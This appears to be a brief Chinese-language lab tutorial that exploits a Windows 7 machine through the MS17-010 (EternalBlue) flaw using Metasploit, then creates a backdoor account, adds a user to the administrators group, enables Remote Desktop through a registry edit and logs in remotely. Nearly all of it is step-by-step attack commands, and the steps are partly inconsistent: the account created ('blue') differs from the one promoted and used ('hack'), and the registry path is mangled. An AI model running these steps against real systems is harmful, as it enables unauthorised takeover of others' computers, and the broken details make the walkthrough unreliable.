一、
攻击机:kaili系统
靶机:win7系统
首先用nmap扫描目标主机是否开启445端口
在kali开启msfconsole的smb模块扫描输入:use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.80.134(目标主机ip)
然后直接run
出现Host is likely VULNERABLE to MS17-010! (表示有这个漏洞)
二、使用模块进行攻击
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.80.134
查看设置选项:show options
开始攻击:exploit或run
攻击成功
三、通过sheel对靶机进行远程打开电脑桌面进行控制
1、首先创建用户名和密码
net user blue blue /add
2、将用户hack添加入管理组
net localgroup administrators hack /add
3、
开启远程桌面功能
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
4、打开Kali远程桌面连接Win7
rdesktop 192.168.80.134:3389
5、输入创建的hack用户登陆成功
